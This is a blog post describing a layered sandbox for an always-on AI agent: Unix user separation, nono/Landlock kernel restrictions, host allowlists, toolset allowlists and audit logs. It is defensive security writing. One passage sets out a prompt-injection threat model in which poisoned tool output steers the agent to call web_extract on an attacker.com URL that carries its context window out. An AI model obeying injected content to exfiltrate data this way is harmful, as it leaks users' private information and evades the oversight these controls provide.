NJannasch.Dev

Sandboxing AI Agents: Kernel-Level Isolation with nono and Landlock

11 min read · Tags: AI, Security, Agents, Homelab

TL;DR: My Hermes Agent runs 24/7 with terminal access, file operations, and MCP calls. I use three layers of defense: OS user isolation between profiles, nono kernel sandboxing (Landlock) for cron scripts, and Hermes toolset allowlists. The sandbox covers subprocess-based tools but not in-process ones, and prompt injection remains unsolved. Least privilege beats detection.

How an Agent Run Actually Works

Before talking about security, it helps to understand what happens when an agent executes. Whether triggered by a person, a cron schedule, or an API call, the lifecycle is the same:

[Figure: agent run lifecycle.
Triggers: Telegram user message, Signal user message, cron scheduled job, API/webhook external call.
LLM reasoning loop: read context → think → call tool → read result → think → repeat. Terminates on completion, error, timeout, or max iterations.
Context: memory and skills (persistent, injected), MCP data (RSS, APIs; read), pre-run script output (sandboxed data fetch).
Actions (tool calls): subprocess tools (terminal, code execution, browser; nono-sandboxable), in-process tools (web search, web extract, file read/write; no sandbox coverage), MCP in-process (data queries, API actions, webhooks; depends on server).
Delivery: Telegram message, Signal message, memory write.
Legend: green = kernel-sandboxable via nono; red = runs in-process, no sandbox coverage. MCP tools provide context and proxy actions; the LLM decides what to call based on what it sees.]

The agent runs a loop: read context, reason, call a tool, read the result, repeat. It terminates when it decides it is done, hits an error, or reaches a timeout. During that loop, it can call any tool its toolset allows, and those tools fall into two categories:

  • Subprocess tools (terminal, code execution, browser) spawn child processes. These can be kernel-sandboxed: the child inherits the restrictions, with no escape possible.
  • In-process tools (web search, file operations, MCP calls) execute inside the gateway’s Python process. No subprocess means no sandbox boundary. The LLM can make outbound HTTP requests or write files directly.
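
The loop described above, including its stop conditions, can be sketched in a few lines. This is a minimal illustration, not Hermes code: `Tool`, `run_agent`, and the `decide` callback (a stand-in for the LLM call) are hypothetical names, and the `subprocess_based` flag only marks which tools could be placed behind a kernel sandbox.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class Tool:
    name: str
    run: Callable[[str], str]
    subprocess_based: bool  # True: spawns a child process, so a kernel sandbox can wrap it


# (tool name, argument), or None when the agent decides it is done
Action = Optional[tuple[str, str]]


def run_agent(decide: Callable[[list[str]], Action],
              tools: dict[str, Tool],
              max_iterations: int = 10) -> tuple[str, list[str]]:
    """Run the read -> think -> call tool -> read result loop until a stop condition."""
    context: list[str] = []
    for _ in range(max_iterations):
        action = decide(context)        # hypothetical stand-in for the LLM call
        if action is None:              # the agent decided it is done
            return "completed", context
        name, arg = action
        tool = tools.get(name)
        if tool is None:                # tool is not in the toolset, so the call fails
            return "error", context
        context.append(tool.run(arg))   # the result becomes context for the next step
    return "max_iterations", context
```

Note that every tool result is appended to the same context the next decision is based on, which is why poisoned tool output matters later in this post.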

MCP sits in between. The tools themselves are just a standardized interface; whether they read data or execute actions depends entirely on what the MCP server exposes. A read-only data endpoint is harmless context. An MCP server that exposes sendEmail or deleteRepo is an action proxy that the LLM can call based on whatever is in its context window, including potentially poisoned data from a previous tool call.

This is why the sandbox story has layers, not a single wall.

Layer 1: OS User Isolation

Each Hermes Agent profile runs as a separate Linux user. The default profile (hermes) handles Telegram and cron jobs. The personal profile (hermes-personal) handles Signal. They have separate home directories, separate Python venvs, separate data.

Linux file permissions mean one profile physically cannot read the other’s memories, sessions, or config, regardless of what the LLM tries. This covers every tool, every code path, every library. No framework-level check needed.

# hermes-personal trying to read the default profile:
cat /home/hermes/.hermes/config.yaml
# → Permission denied

# hermes trying to read the personal profile:
ls /home/hermes-personal/.hermes/memories/
# → Permission denied

This is the simplest and most robust layer. Fifty years of Unix permission model, battle-tested.
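
One way to check that a profile directory is actually closed to other users is to inspect its mode bits. The sketch below is an illustration under assumptions: `is_private` is a hypothetical helper, and it only looks at the permission bits of a single path, not at ACLs or parent directories.

```python
import os
import stat


def is_private(path: str) -> bool:
    """Return True if neither group nor others have any access bits set on path."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    # S_IRWXG / S_IRWXO cover read, write, and execute for group and others.
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0
```

Run against a directory such as /home/hermes/.hermes, a check like this would catch an accidental chmod 755 before it turns into cross-profile leakage.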

Layer 2: Kernel Sandbox with nono

I was recently pointed towards nono, a capability-based sandboxing library that enforces restrictions at the kernel level via Landlock. I wanted to see how far I could take it with Hermes.

Within each profile, cron scripts now run inside a nono sandbox via nono-py. The sandbox restricts filesystem access to only the directories the script needs and enforces a network host allowlist via a filtering proxy. My cron script can reach its configured API endpoint and an RSS feed, nothing else.
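
The decision at the heart of a host allowlist is a match of the requested hostname against the configured list. The following is a minimal sketch of that check, not nono's implementation: `is_host_allowed` is a hypothetical helper, and exact, case-insensitive matching without wildcards is an assumption.

```python
from urllib.parse import urlsplit


def is_host_allowed(url: str, allow_hosts: list[str]) -> bool:
    """Allow a request only if its hostname exactly matches an allowlisted host."""
    host = urlsplit(url).hostname  # lowercased by urlsplit; None if the URL has no host
    if host is None:
        return False
    allowed = {h.lower().rstrip(".") for h in allow_hosts}
    return host.rstrip(".") in allowed
```

Exact matching is the conservative choice: a lookalike such as api.example.com.attacker.com is rejected because the whole hostname is compared, not a prefix.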

[Figure: three nested layers per profile.
OS user hermes (Telegram, MCP): nono kernel sandbox around cron scripts, terminal commands, and file operations; Hermes toolset enabled_toolsets: ["cronjob"]; network: MCP + blog RSS only; filesystem: ~/.hermes/ scoped; audit: every request logged.
OS user hermes-personal (Signal): nono kernel sandbox around terminal commands, file operations, and memory; separate venv + data; network: Signal daemon + LLM only; filesystem: own profile only; cannot read default profile.
Legend: OS user isolation, kernel sandbox (nono/Landlock), framework toolset filter.]

The sandbox is irrevocable and inherited by all child processes: no escape via subprocess, ctypes, or spawning a binary. Configuration is two-tiered: global defaults in config.yaml, per-job overrides in jobs.json.

# config.yaml: global sandbox defaults
cron:
  sandbox:
    enabled: true
    defaults:
      filesystem:
        allow_read: ["~/.hermes/scripts/"]
        allow_write: []
      network:
        allow_hosts: []

// jobs.json: per-job override
{
  "sandbox": {
    "enabled": true,
    "network": {
      "allow_hosts": ["api.example.com", "feeds.example.com"]
    }
  }
}
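
One plausible way to combine the two tiers is a recursive merge in which per-job values win over the global defaults. The sketch below assumes that behaviour; the actual merge logic in the fork is not shown in this post, and `merge_sandbox_config` is a hypothetical name.

```python
import copy


def merge_sandbox_config(defaults: dict, override: dict) -> dict:
    """Recursively merge override into defaults; override wins, lists are replaced whole."""
    merged = copy.deepcopy(defaults)
    for key, value in override.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = merge_sandbox_config(merged[key], value)
        else:
            merged[key] = copy.deepcopy(value)
    return merged


# Values copied from the config.yaml defaults and the jobs.json override above.
defaults = {
    "filesystem": {"allow_read": ["~/.hermes/scripts/"], "allow_write": []},
    "network": {"allow_hosts": []},
}
job = {
    "enabled": True,
    "network": {"allow_hosts": ["api.example.com", "feeds.example.com"]},
}
effective = merge_sandbox_config(defaults, job)
```

With these inputs the job keeps the default filesystem scope and gains only the two network hosts it names. Replacing lists whole, rather than appending, means a job can never silently inherit extra hosts from another tier.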

Layer 3: Toolset Allowlists

The enabled_toolsets field on each cron job controls which tools the LLM sees. My monitoring job only gets ["cronjob"]: no terminal, no browser, no MCP. The LLM cannot call tools it does not know exist. This is the weakest layer (framework-level, not kernel-level), but it reduces the attack surface for the reasoning loop.
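
The filtering step amounts to building the tool list shown to the LLM from the allowlist rather than from the full registry. A minimal sketch, assuming a registry that maps toolset names to tool names; the registry contents and `visible_tools` are hypothetical, not Hermes internals.

```python
def visible_tools(registry: dict[str, list[str]], enabled_toolsets: list[str]) -> list[str]:
    """Return only the tools whose toolset is explicitly enabled, in sorted order."""
    tools: set[str] = set()
    for toolset in enabled_toolsets:
        tools.update(registry.get(toolset, []))  # unknown toolset names contribute nothing
    return sorted(tools)


# Hypothetical registry, for illustration only.
REGISTRY = {
    "cronjob": ["cron_list", "cron_status"],
    "terminal": ["run_command"],
    "browser": ["open_page"],
}
```

Because the default is an empty set, a job with no enabled_toolsets sees no tools at all, which is the deny-by-default behaviour an allowlist should have.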

Audit Trail

Every sandboxed script execution logs its network activity to cron/audit.jsonl. I can ask the agent to review its own audit logs on demand:

Review the sandbox audit logs and tell me if anything looks unusual.

The agent runs a review script, sees every host its cron scripts contacted, and flags anomalies. The agent watches itself, with tamper-evident logs it cannot retroactively edit.

## Sandbox Audit Summary
Runs: 16 total, 0 failed
Network events: 112

Hosts contacted:
- api.example.com: 96x
- feeds.example.com: 16x

Anything not on that list would be a red flag worth investigating.
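
The core of such a review is small: count the hosts in the log and report any that are not expected. The sketch below assumes each line of the JSONL file is an object with a `host` field; that schema and the `summarize_audit` name are assumptions, since the log format is not shown in this post.

```python
import json
from collections import Counter
from typing import Iterable


def summarize_audit(lines: Iterable[str],
                    expected_hosts: set[str]) -> tuple[Counter, list[str]]:
    """Count contacted hosts and list every host outside the expected set."""
    counts: Counter = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue                   # tolerate blank lines
        event = json.loads(line)
        host = event.get("host")       # assumed field name
        if host:
            counts[host] += 1
    unexpected = sorted(h for h in counts if h not in expected_hosts)
    return counts, unexpected
```

It could be fed an open file handle for cron/audit.jsonl together with the job's allow_hosts; a non-empty second return value is the red flag.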

What This Does Not Cover

Being honest about the gaps: nono sandboxes subprocesses, meaning terminal commands, pre-run scripts, and anything else that goes through subprocess.Popen. But agent frameworks also have native tools that run in-process: web search, page extraction, file operations, memory writes. These execute inside the gateway’s Python process, not as child processes, so they bypass the kernel sandbox entirely.

The risk is indirect. MCP tools themselves just provide context: they return data for the LLM to evaluate. But that data becomes part of the context window, and based on it the LLM decides which tools to call next. A poisoned MCP response or a webpage with hidden prompt injection could steer the LLM into calling web_extract("https://attacker.com/steal?data=<context>"), exfiltrating whatever is in its context window via a URL parameter. The web tool makes outbound HTTP requests to any host from within the process. No subprocess sandbox can catch that.

My mitigation: convert web-fetching cron jobs to the pre-run script pattern. Instead of letting the LLM browse a page directly, a bash script fetches the content via curl inside a nono sandbox (network-restricted to one host), strips the HTML, and feeds sanitized plain text to the agent. The LLM never sees raw HTML, so the injection surface shrinks dramatically. And even if the script itself were compromised, the sandbox prevents it from reaching anything beyond the allowed host.
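
The sanitizing step can be illustrated with the standard library. The pre-run script described above is bash around curl; the Python below is a swapped-in sketch of the text-extraction step only, with `strip_html` as a hypothetical helper. It drops tags, comments, and the contents of script and style elements, which narrows the channel but does not by itself make the remaining text trustworthy.

```python
from html.parser import HTMLParser


class _TextExtractor(HTMLParser):
    """Collect text nodes, skipping the contents of <script> and <style>."""

    SKIP = {"script", "style"}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.parts: list[str] = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth > 0:
            self._skip_depth -= 1

    def handle_data(self, data):
        # Comments never reach this method; HTMLParser routes them to handle_comment.
        if self._skip_depth == 0:
            self.parts.append(data)


def strip_html(html: str) -> str:
    """Return the text content of html with runs of whitespace collapsed."""
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()  # flush any buffered text
    return " ".join(" ".join(parser.parts).split())
```

Text hidden with CSS still passes through, since this sketch does not evaluate styles; the network restriction on the fetching script remains the actual boundary.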

Prompt Injection Is Unsolved: Focus on Intent

I spent some time looking into prompt injection defenses before realizing I was solving the wrong problem. An injection payload does not need to be in English; it can be in a language you don’t read, encoded in Unicode tricks, hidden in invisible characters. Filtering for “bad prompts” is not a game you win.

What clicked for me is that this is just the old least-privilege principle applied to a new runtime. Instead of asking “is this request malicious?” ask “does this process need this capability at all?” A cron job fetching an RSS feed has no business with terminal access. A script talking to one API endpoint has no business with unrestricted network. A profile for private conversations has no business reading another profile’s memory. Tighten the permissions enough and a successful injection has nowhere to go.

Next Step: Minimal Containers

An even stricter approach: run each agent profile in a minimal container. Not an Ubuntu-with-everything image, but a purpose-built container with only the binaries the agent actually needs. No gcc, no ssh, no package manager. If the agent only runs Python scripts and curl, ship only Python and curl. The container’s filesystem becomes the allowlist. Combined with nono inside the container, you get kernel sandboxing within an already minimal surface. I have not done this yet, but it is the logical next step.

Summary

| Layer | What it covers | Enforcement |
| --- | --- | --- |
| OS user isolation | Profile-to-profile data leakage | Kernel (file permissions) |
| nono/Landlock sandbox | Cron scripts, terminal commands | Kernel (Landlock LSM) |
| Network proxy | Outbound host filtering for scripts | nono proxy (HTTP_PROXY) |
| Toolset allowlist | Which tools the LLM can call | Framework (Hermes config) |
| Audit trail | What sandboxed scripts actually did | Append-only JSONL log |

The remaining gap is in-process tools, and knowing where your sandbox ends is half the security model.

The Hermes Agent integration with nono is experimental. I maintain a fork with the sandbox patches (cron script sandboxing, terminal tool isolation, profile-scoped filesystem, audit logging, network proxy). It is not upstreamed and may break with Hermes updates.

One thing I keep noticing while working on this: the details matter (this is security, after all), but systems thinking and architecture knowledge matter more. Understanding how a Linux user model works, how Landlock fits into the kernel security stack, how MCP bridges context and actions, how subprocess isolation differs from in-process execution: none of this is specific to AI agents. It is operating systems, networking, and application security applied to a new domain. For the intrinsically motivated, the rabbit hole goes deep and every layer teaches something worth knowing.

The views and opinions expressed here are my own and do not reflect those of my employer.